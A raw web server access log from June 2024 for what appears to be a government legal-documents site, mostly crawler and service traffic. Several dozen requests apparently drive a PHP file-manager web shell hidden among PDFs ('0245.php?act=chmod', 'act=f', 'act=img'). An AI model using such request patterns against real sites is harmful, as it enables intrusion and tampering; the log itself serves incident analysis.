216.245.221.92 - - [29/Jun/2024:15:21:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:15:21:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:15:21:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:15:21:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1483.pdf HTTP/1.1" 200 455381
157.55.39.62 - - [29/Jun/2024:15:22:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0168.pdf HTTP/1.1" 200 720268
66.249.66.12 - - [29/Jun/2024:15:22:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1211.pdf HTTP/1.1" 304 -
66.249.66.11 - - [29/Jun/2024:15:22:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3313.pdf HTTP/1.1" 200 400705
66.249.66.11 - - [29/Jun/2024:15:22:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2770.pdf HTTP/1.1" 200 448757
201.245.192.253 - - [29/Jun/2024:15:22:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:15:23:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2962.pdf HTTP/1.1" 200 357846
216.244.66.195 - - [29/Jun/2024:15:23:13 -0500] "GET /BLA/resoluciones/AUTOS%202011/6281.pdf HTTP/1.1" 200 195820
216.244.66.195 - - [29/Jun/2024:15:23:19 -0500] "GET /BLA/resoluciones/AUTOS%202011/6342.pdf HTTP/1.1" 200 228421
216.244.66.195 - - [29/Jun/2024:15:23:24 -0500] "GET /BLA/resoluciones/AUTOS%202013/3144.pdf HTTP/1.1" 200 402132
66.249.66.12 - - [29/Jun/2024:15:23:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2292.pdf HTTP/1.1" 200 354535
201.245.192.253 - - [29/Jun/2024:15:23:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [29/Jun/2024:15:23:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:15:23:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [29/Jun/2024:15:24:02 -0500] "GET /BLA/resoluciones/AUTOS%202013/3341.pdf HTTP/1.1" 200 516902
216.244.66.195 - - [29/Jun/2024:15:24:39 -0500] "GET /BLA/resoluciones/AUTOS%202015/4847.pdf HTTP/1.1" 200 538130
66.249.66.13 - - [29/Jun/2024:15:24:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/1989.pdf HTTP/1.1" 200 339200
172.22.2.4 - - [29/Jun/2024:15:23:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.11 - - [29/Jun/2024:15:24:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0891.pdf HTTP/1.1" 304 -
40.77.167.76 - - [29/Jun/2024:15:24:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1593.pdf HTTP/1.1" 200 341267
201.245.192.253 - - [29/Jun/2024:15:24:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [29/Jun/2024:15:25:15 -0500] "GET /BLA/resoluciones/AUTOS%202018/4704.pdf HTTP/1.1" 200 235020
172.22.2.4 - - [29/Jun/2024:15:23:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
66.249.66.13 - - [29/Jun/2024:15:25:43 -0500] "GET /Publicaciones/2024EE78900.pdf HTTP/1.1" 404 227
66.249.66.12 - - [29/Jun/2024:15:25:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1300.pdf HTTP/1.1" 200 360622
66.249.66.11 - - [29/Jun/2024:15:25:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0579.pdf HTTP/1.1" 304 -
216.244.66.195 - - [29/Jun/2024:15:25:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/5986.pdf HTTP/1.1" 200 417296
66.249.66.11 - - [29/Jun/2024:15:25:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/04777.pdf HTTP/1.1" 200 511929
40.77.167.76 - - [29/Jun/2024:15:25:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/2735.pdf HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:15:25:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:15:25:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:15:26:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0203.pdf HTTP/1.1" 200 348783
66.249.66.12 - - [29/Jun/2024:15:26:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/8168.pdf HTTP/1.1" 200 499085
66.249.66.11 - - [29/Jun/2024:15:26:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3160.pdf HTTP/1.1" 200 396725
66.249.66.11 - - [29/Jun/2024:15:26:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4281.pdf HTTP/1.1" 200 522608
66.249.66.12 - - [29/Jun/2024:15:26:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3043.pdf HTTP/1.1" 200 359758
216.245.221.92 - - [29/Jun/2024:15:26:49 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.11 - - [29/Jun/2024:15:26:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0711.pdf HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:15:26:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:15:27:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35107
201.245.192.253 - - [29/Jun/2024:15:27:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35135
66.249.66.13 - - [29/Jun/2024:15:27:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0545.pdf HTTP/1.1" 200 348932
66.249.66.12 - - [29/Jun/2024:15:27:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2655.pdf HTTP/1.1" 200 391827
157.55.39.62 - - [29/Jun/2024:15:27:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0891.pdf HTTP/1.1" 200 911355
201.245.192.253 - - [29/Jun/2024:15:27:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:15:27:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:15:28:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0558.pdf HTTP/1.1" 200 809581
66.249.66.12 - - [29/Jun/2024:15:28:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%2051-100/2002RES79.tif HTTP/1.1" 200 73362
66.249.66.11 - - [29/Jun/2024:15:28:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1422.pdf HTTP/1.1" 200 343793
201.245.192.253 - - [29/Jun/2024:15:28:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [29/Jun/2024:15:28:45 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20T-411%20DE%201992.doc HTTP/1.1" 200 41984
172.22.2.4 - - [29/Jun/2024:15:28:46 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
66.249.66.11 - - [29/Jun/2024:15:28:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0477.pdf HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:15:28:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:15:29:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35437
66.249.66.11 - - [29/Jun/2024:15:29:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5173.pdf HTTP/1.1" 200 380813
66.249.66.11 - - [29/Jun/2024:15:29:28 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000009%20DEL%2010%20DE%20OCTUBRE%20DEL%202022.pdf HTTP/1.1" 200 292772
47.128.38.194 - - [29/Jun/2024:15:29:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=01674.pdf HTTP/1.1" 200 2716
200.118.242.169 - - [29/Jun/2024:15:29:40 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
200.118.242.169 - - [29/Jun/2024:15:29:40 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
47.128.47.57 - - [29/Jun/2024:15:29:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3021.pdf HTTP/1.1" 200 2716
200.118.242.169 - - [29/Jun/2024:15:29:53 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/lDvzflGPLs7ABL8VnDSgxHlikI55GV2OaGXPOFTk/P1VLfqeUdWs1RZRfgm3kLh8S804Cjsfc/ytltxUduvzdcpEL6bkw5I2t/jgmafkUAmZSrbM25XAB55evAKws5a4wynkbMIEOK5L9Kt/Z5p54SVq+FJylRIf65NIiMsScwZpDJerutruiEHh0E1TKk3CtvuplbtbIISAq3OwM7rsxjc/lAMoYNMoOYNQ8bMhd/S1DXabm8mg4R2QTKeAGIvY9uHyRAwiNnQ==&u=U2FsdGVkX183NDSMBKDM3/+akMd/YtcesKz01Pa/hBY=&y=U2FsdGVkX19xKwkhSm4FFtgp15PFXpSCyDtQ6fToJ/8epaSV/Yc1YobB3ndgIqrS HTTP/1.1" 200 26
200.118.242.169 - - [29/Jun/2024:15:29:54 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18+9Vbbo2cRLK7vVfkip5thZMD4v6N4LneGCRvwn2qnup0MEygoHJp/zGBovwHR91/Ce7UPSwavSi+j0Cr8UyvHn+BUbnX78wzOXfNSan/Q4fErx497PKfUeyoZhrfTQYopzRpfxhGZMWMWUj+tQ5MA6yqA8vTEg2FXM9chlYV7lIGzPGwrhhFxtYUfu2IK84mV9TtdILoR8kpiBUUUbjdehmZ+VG4MvYA7ykOIMNdTf90Vz3ra0YHXFv7C6noDIuZYWfU/cInJ6a6fvg53t3BVhrgiBtyMlaE8U/oAV9NSHF67AWpMiFgAHe5DukFsjHezzqIVf7d8GK66ogUCB0eYNGRT1PxwFpb0HnmQvsrhfvrurL5T3FFE5T3FkhwfWcbfld9vX5RahKd/hBj8y+YSTK4EKKCBoURoKrtS/POcy7bcHY+5DRh5xSMIW2owO3n4ksilXLtQTl8LUBxyNEhK1qmQkVhhqzHTcYeWUKszhhrt6bZI68fhuDSzuQT6vGJRTSf3VIoEpQDZBIbxyb30J8o51/JRD6eI41xb4IjbiXfpbW7NCoJC6JrKm0rQeHTSjtqOqPzmSav+y3fi+lF+GBr3C1D4FVmc0EyN/akkyM7dPnID1cdytZfM69E+ol+kRSlyHo6Idb3UKvjA7v6sD8LU3L0XhI2v9BD7ggX8loilAUDQAd3HsThiIWLkaSGoT7EfmZVR4rxw0ZyGt6CjT724lUttoFoOGInWHXbLbQNPT/umjaRbXGwUrwTPfjjxyiFS/wunrOmUpAW57z7LmXkvL6PrEssstwQhj3B/axt/8g8C1oudbBOillORzr1ApowVCMi4MxoUZfY+X5Gd12RqQP4LbjtDWKr0FVqjhAeyFPMivSz/0WveYjC6TsltBP0m5XJQD2+0KIIR+GEJjOWsb0SmFpC8vp02FBAzRuECqOz6fyfwQaBisBCzqyvxFlOmlqdF5qc8FQ1X4q1lF+bhWbjGnRY5qZb6yQ6nLySUeE9IE1BcyY2hloa/KKFYi0bg9phFQv/hJFkTDrup8vbS9HE2NoeK8jGRDt+B3uP7Z34X3TcQrLolv2W3+mppUULGZKqtYyYg3cn2lgjPLUOoXespJFHWyNqjrWKULMmxql3WVZ9wE08B2ix+czzND7zwrK50bjuJQUNwCsmd1cycnZt7V+UWs0lawoD9AWd6kGOBjq6jUEOfGYo5P67mAQbE3ZB+j106jknY8ogS8+tUpR7o7bXLwbh65/ebSXe9WW6mwJHJ0OA8iWqp86/Cpnyqk6vqwS/X1X0A1MNzbbPAacf3Fz8=&u=U2FsdGVkX183NDSMBKDM3/+akMd/YtcesKz01Pa/hBY=&y=U2FsdGVkX19xKwkhSm4FFtgp15PFXpSCyDtQ6fToJ/8epaSV/Yc1YobB3ndgIqrS HTTP/1.1" 200 26
200.118.242.169 - - [29/Jun/2024:15:29:54 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18ukuQGI+kXiwbWBau504lrOV4KDRu5S7kss6M8w2RZVKJtDmllLRDPeDmFqKONagQVFOJKfDC8plaXZVsPcc/VlanVFWQ1ZaMYiLyKGEar4jcFeqHk3usxmlD2WQfZNtrnHiyTm5ev+kJpkn25EtfWjLzQybBJoCo=&u=U2FsdGVkX183NDSMBKDM3/+akMd/YtcesKz01Pa/hBY=&y=U2FsdGVkX19xKwkhSm4FFtgp15PFXpSCyDtQ6fToJ/8epaSV/Yc1YobB3ndgIqrS HTTP/1.1" 200 26
200.118.242.169 - - [29/Jun/2024:15:29:54 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX195FrUhQMdCh3SJSH6+AAmGw+JqDWC5bu8ahRq46ejLq7nqXkR6nTqnNWnZJqiqWbxhLx9D78JTZQnnYc7V6RNRrE16g4koPSUk+lOCSRvO+Y83KCSeLiQJcxV6dMVB6QRktC5tDmxExCcJ+XpBe9vKi2vz1CFMPuU=&u=U2FsdGVkX183NDSMBKDM3/+akMd/YtcesKz01Pa/hBY=&y=U2FsdGVkX19xKwkhSm4FFtgp15PFXpSCyDtQ6fToJ/8epaSV/Yc1YobB3ndgIqrS HTTP/1.1" 200 26
200.118.242.169 - - [29/Jun/2024:15:29:54 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18UEToXT03RCvAEQ7Oj46T0xn2w3CTcCU+NFVuCY5qIDndJLMOdDW+S5dqNnvLLIWchtOb7hdzCIJa1A4mjZKxIhSuokWufDw3El5N7sHlnnK4bJiuTutlfmn5lSmM+frESX/gscorHEGPJr9pJvEw005DRnDSNXfE=&u=U2FsdGVkX183NDSMBKDM3/+akMd/YtcesKz01Pa/hBY=&y=U2FsdGVkX19xKwkhSm4FFtgp15PFXpSCyDtQ6fToJ/8epaSV/Yc1YobB3ndgIqrS HTTP/1.1" 200 26
200.118.242.169 - - [29/Jun/2024:15:29:55 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/W+LfIJ03Ugz+NQ/B2MYDkewBuNGCV5bneCmxivus+Jtd/RHY3uWmIu9onzAwi2ILbCcysvHBwlirDWuTJQ9qC9l/qRs5p6hm9dmmC6apT+nNOcNJjxZHwR1Eo/MjCRf8sKs8BZcB7Qt5K++pVKiqrKWPNiuO9AzYhRi8h25EB5zptoAV2vo7TX5iI/Yo5R4rfD2JVOtFjSA==&u=U2FsdGVkX183NDSMBKDM3/+akMd/YtcesKz01Pa/hBY=&y=U2FsdGVkX19xKwkhSm4FFtgp15PFXpSCyDtQ6fToJ/8epaSV/Yc1YobB3ndgIqrS HTTP/1.1" 200 26
200.118.242.169 - - [29/Jun/2024:15:29:55 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19MOPUkCq6h1J1PucQa9cjkyEdEpStY5AlWTycgsrc7vnoMMh+HgOtODt9KTZtaI0ivHurBOLjocjMLZbTz5uXXgVG2FCGQVuqhWMddZAkLyNR4Q3r9jk5rzm3MqVVZoAE11sSWV4kdpe0q1/+pjTugleor6MwNPu3BhLzgrV7hsYZAP6hwwKGVDHe5UbTN5LH42/MOz0Ny+vkkTnr7isHbaFAkdgZNDRefKoK41NFR/BKjZC0L0uuz4LIX0U1oKbUYt0YDdd8zB7zInmXnK/3emI/7z/19nwk3A/J5hgyCakRrEVaoGmc/yJ/jOQqyMu0AoIr2+aTnDCs/z72MbtJJkGPjC7vnhUA8RjCp/fJ91ZKScrkvruVIqqrjxi0F+VDHobAK+LBLiWfonj/HE9NS4yzdcBMUtqB994vPauZwBK9RRQxdvoLh/8lbfVgt1meeOUVDvOC6b03Iy4K1W/lkieGK4NgUxV4wYSF9BXXepzIKGpEic0Dt26JIN8huPvoAjAIf/BJV9apKy+vBxpGWeoQ/gWup2MEALGcJ0T1hMIGH2/Th/zgaT0++p0U05Gl/StoCEA/ZNQ==&u=U2FsdGVkX183NDSMBKDM3/+akMd/YtcesKz01Pa/hBY=&y=U2FsdGVkX19xKwkhSm4FFtgp15PFXpSCyDtQ6fToJ/8epaSV/Yc1YobB3ndgIqrS HTTP/1.1" 200 26
200.118.242.169 - - [29/Jun/2024:15:29:55 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/5jTq6EfLQtW0BXLenTHpL5/fV3jC4SEjrl80F3XkhEbHtufwALRYjI/mncCdNcqHNNzfv5zGmrmeU5oO7S0/mP+/1GLCDffgQTfYNLwxdy0sF+BAvyoOI/0w66H53uvhxOfHlKIv9txOBCHmM/ffQraGYuxX7nQLmmrE4b2r+Fl24cDEBVfk3CynrdEwOqTv3jZiutNOv6fgTxkN6Ps5Vhb0DqikdQp0wXldAy5vDMxmL3sn8kaqLqq8x3to6yqhcH5aHofyqcMeYU4fSrh+9AXa67h/xX4jYR1XRwO8ir3Qt/N6tNQZ4EuaywNM4ScwWdRHPBbA5AS5fzgUb7kMBrJ9BrtfLoUJ1Eq30GG0JrLEUYpMgndiTSGUVO7YZ8va6VxTobGC6UaNy/LOOneVP/a/bkvBVgVgvyl/GYeCQma4jJ2Lr65DwJ4pumXCVN8MM3vPJoSuwiIXUKuIU1JJr7eJKXEc4Rie2xmHPFrrJrpfDUfMdXqEiNludop7gfpS501PC9QBHZm8TQSK/aV2lOSbLo8JFtxE=&u=U2FsdGVkX183NDSMBKDM3/+akMd/YtcesKz01Pa/hBY=&y=U2FsdGVkX19xKwkhSm4FFtgp15PFXpSCyDtQ6fToJ/8epaSV/Yc1YobB3ndgIqrS HTTP/1.1" 200 26
201.245.192.253 - - [29/Jun/2024:15:29:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:15:29:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.114.190 - - [29/Jun/2024:15:30:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3342.pdf HTTP/1.1" 200 2716
201.245.192.253 - - [29/Jun/2024:15:30:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35135
47.128.38.163 - - [29/Jun/2024:15:30:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3047.pdf HTTP/1.1" 200 2716
66.249.66.11 - - [29/Jun/2024:15:30:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4434.pdf HTTP/1.1" 200 470749
172.22.2.4 - - [29/Jun/2024:15:28:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
92.249.48.197 - - [29/Jun/2024:15:30:55 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [29/Jun/2024:15:30:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:15:31:02 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20T-411%20DE%201992.doc HTTP/1.1" 304 -
47.128.121.60 - - [29/Jun/2024:15:31:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=2852.zip HTTP/1.1" 200 2716
172.22.2.4 - - [29/Jun/2024:15:29:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57136
173.252.127.5 - - [29/Jun/2024:15:31:25 -0500] "GET /bogota-destino-elegido-por-la-universidad-ana-g-mendez-de-puerto-rico-para-explorar-su-riqueza-natural-y-procesos-comunitarios.html?fbclid=IwZXh0bgNhZW0CMTEAAR1MITKdF4o0zoGs2q9v8zzto8Wcu3w4iY88IWhbhAaHbuAl-WnZFiN2-2E_aem_mMYPTsDx_Ye6A5MfPadQoQ HTTP/1.1" 200 1196
66.249.66.12 - - [29/Jun/2024:15:31:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0898.pdf HTTP/1.1" 200 445499
47.128.118.55 - - [29/Jun/2024:15:31:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3704.pdf HTTP/1.1" 200 2740
66.249.66.12 - - [29/Jun/2024:15:31:38 -0500] "GET /BLA/resoluciones/AUTOS%202020/2081.pdf HTTP/1.1" 200 334464
47.128.63.149 - - [29/Jun/2024:15:31:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=02406.pdf HTTP/1.1" 200 2716
216.245.221.92 - - [29/Jun/2024:15:31:49 -0500] "HEAD / HTTP/1.1" 200 -
173.252.95.3 - - [29/Jun/2024:15:31:49 -0500] "GET /bogota-destino-elegido-por-la-universidad-ana-g-mendez-de-puerto-rico-para-explorar-su-riqueza-natural-y-procesos-comunitarios.html HTTP/1.1" 200 1196
47.128.113.63 - - [29/Jun/2024:15:31:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=1931.pdf HTTP/1.1" 200 2741
201.245.192.253 - - [29/Jun/2024:15:31:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:15:31:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.124.200 - - [29/Jun/2024:15:32:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3504.pdf HTTP/1.1" 200 2740
47.128.59.228 - - [29/Jun/2024:15:32:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=2922.pdf HTTP/1.1" 200 2716
66.249.66.11 - - [29/Jun/2024:15:32:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0007.pdf HTTP/1.1" 200 378879
66.249.66.13 - - [29/Jun/2024:15:32:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0442.pdf HTTP/1.1" 304 -
47.128.124.91 - - [29/Jun/2024:15:32:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=00995.pdf HTTP/1.1" 200 2741
47.128.48.243 - - [29/Jun/2024:15:32:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3353.pdf HTTP/1.1" 200 2740
201.245.192.253 - - [29/Jun/2024:15:32:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.35.152 - - [29/Jun/2024:15:32:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3887.pdf HTTP/1.1" 200 2741
47.128.48.206 - - [29/Jun/2024:15:33:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=03488.pdf HTTP/1.1" 200 2716
47.128.55.109 - - [29/Jun/2024:15:33:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=01649.pdf HTTP/1.1" 200 2741
66.249.66.12 - - [29/Jun/2024:15:33:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5258.pdf HTTP/1.1" 200 607616
66.249.66.13 - - [29/Jun/2024:15:33:32 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%204%20del%2028%20de%20Junio%20de%202011.pdf HTTP/1.1" 200 960158
47.128.31.119 - - [29/Jun/2024:15:33:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&c=1&f=3202.pdf HTTP/1.1" 200 2739
201.245.192.253 - - [29/Jun/2024:15:33:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
47.128.55.110 - - [29/Jun/2024:15:33:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=2952.PDF&white=1 HTTP/1.1" 200 3036
47.128.55.110 - - [29/Jun/2024:15:33:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.55.110 - - [29/Jun/2024:15:33:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.55.110 - - [29/Jun/2024:15:33:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.55.110 - - [29/Jun/2024:15:33:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.55.110 - - [29/Jun/2024:15:33:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.55.110 - - [29/Jun/2024:15:33:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.55.110 - - [29/Jun/2024:15:33:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.55.110 - - [29/Jun/2024:15:33:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.55.110 - - [29/Jun/2024:15:33:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.55.110 - - [29/Jun/2024:15:33:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
201.245.192.253 - - [29/Jun/2024:15:33:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:15:33:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.55.174 - - [29/Jun/2024:15:34:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=0103.PDF HTTP/1.1" 200 2741
47.128.61.20 - - [29/Jun/2024:15:34:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&c=1&f=3802.pdf HTTP/1.1" 200 2740
47.128.43.232 - - [29/Jun/2024:15:34:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=0068.zip HTTP/1.1" 200 2716
66.249.66.11 - - [29/Jun/2024:15:34:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1589.pdf HTTP/1.1" 304 -
172.22.2.4 - - [29/Jun/2024:15:32:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61913
47.128.16.205 - - [29/Jun/2024:15:34:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=00362.pdf HTTP/1.1" 200 2716
66.249.66.12 - - [29/Jun/2024:15:34:51 -0500] "GET /portel_dama/libreria/pdf/ecosistemas/restauracion/sitio/22_proye/xtras_in/3a.pdf HTTP/1.1" 404 1018
47.128.32.197 - - [29/Jun/2024:15:34:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3352.pdf HTTP/1.1" 200 2716
201.245.192.253 - - [29/Jun/2024:15:34:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.43.245 - - [29/Jun/2024:15:35:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=4743.pdf HTTP/1.1" 200 2716
47.128.125.24 - - [29/Jun/2024:15:35:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3015.pdf HTTP/1.1" 200 2740
69.171.249.13 - - [29/Jun/2024:15:35:31 -0500] "GET /robots.txt HTTP/1.1" 404 1034
66.249.66.11 - - [29/Jun/2024:15:35:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2988.pdf HTTP/1.1" 200 674793
